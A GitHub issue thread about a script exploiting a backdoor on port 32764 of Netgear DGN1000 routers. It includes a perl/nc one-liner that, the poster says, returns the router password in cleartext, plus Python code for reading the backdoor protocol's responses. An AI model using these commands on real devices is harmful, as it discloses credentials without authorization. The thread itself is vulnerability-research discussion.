DGN1000 #3

grigio opened this Issue Jan 2, 2014 · 6 comments



3 participants

grigio commented Jan 2, 2014

Your script returns:

Traceback (most recent call last):
  File "backdoorolol.py", line 23, in <module>
    print send_message(s, 2, "http_password")[1]
  File "backdoorolol.py", line 11, in send_message
    sig, ret_val, ret_len = struct.unpack('<III', s.recv(0xC))
struct.error: unpack requires a string argument of length 12

Anyway with DGN1000 Netgear N150 and the script below I'm able to see the password in cleartext.

perl -e 'print pack("(III)<", 0x53634d4d, 0x01, 0x00)' \
| nc 32764

I tried also over internet (with or without remote administration enabled) and it doesn't work, so it seems just a local LAN exploit.


I should have added a little loop and checked the length of the returned string :)
I'll update the script. Thank you for reporting the issue.
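The exact-length read mentioned above, as an added example that is not part of the repository's script: `recv_exact` loops until all requested bytes arrive (or the peer closes), so a short read never reaches struct.unpack, and `read_response` validates the 0x53634d4d signature before trusting the length field. `FragmentedSocket` is a constructed stand-in for a real socket so the example runs offline.

```python
import struct

# Header layout used by the script on this page: signature, return value, payload length.
SIGNATURE = 0x53634D4D                     # little-endian on the wire: b"MMcS"
HEADER_FMT = "<III"
HEADER_LEN = struct.calcsize(HEADER_FMT)   # 12 bytes


def recv_exact(sock, n):
    """Read exactly n bytes, looping over short reads.

    A plain sock.recv(12) may return fewer bytes than asked for, which is what
    produced the struct.error traceback in this issue. Raises EOFError if the
    peer closes the connection before n bytes have arrived."""
    chunks = []
    remaining = n
    while remaining:
        chunk = sock.recv(remaining)
        if not chunk:
            raise EOFError("connection closed after %d of %d bytes" % (n - remaining, n))
        chunks.append(chunk)
        remaining -= len(chunk)
    return b"".join(chunks)


def read_response(sock):
    """Read one header and its payload; return (ret_val, payload).

    The signature is checked before ret_len is used, so a stray or unrelated
    service answering on the port cannot make the reader wait for garbage."""
    sig, ret_val, ret_len = struct.unpack(HEADER_FMT, recv_exact(sock, HEADER_LEN))
    if sig != SIGNATURE:
        raise ValueError("unexpected signature 0x%08x" % sig)
    payload = recv_exact(sock, ret_len) if ret_len else b""
    return ret_val, payload


class FragmentedSocket:
    """Constructed fake socket that returns data in small pieces (hypothetical
    helper, not a real socket), reproducing the short reads seen above."""

    def __init__(self, data, chunk=5):
        self._data = data
        self._chunk = chunk

    def recv(self, n):
        piece = self._data[:min(n, self._chunk)]
        self._data = self._data[len(piece):]
        return piece


def demo():
    # Constructed response: a valid header followed by a 4-byte payload.
    payload = b"demo"
    data = struct.pack(HEADER_FMT, SIGNATURE, 0, len(payload)) + payload
    return read_response(FragmentedSocket(data))
```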

@elvanderb elvanderb closed this Jan 2, 2014

I'm not sure if there is any difference to the device reported above, but the backdoor is also present in the "Netgear N150 DGN1000B".

By the way: Nice Work! Perhaps could you give some more information about the tools you used?


Thank you I updated the README :)
I just used nmap, google, binwalk, IDA and a patched version of squashfs tools :)

grigio commented Jan 3, 2014

@elvanderb I forgot to ask, do you recommend any other alternative firmware without this exploit? I tried to look at pfSense and OpenWrt and it seems this router isn't supported.


No, sorry :)


Update: The DGN1000B is the firmware for countries which use Annex B (e.g. Germany) for DSL.
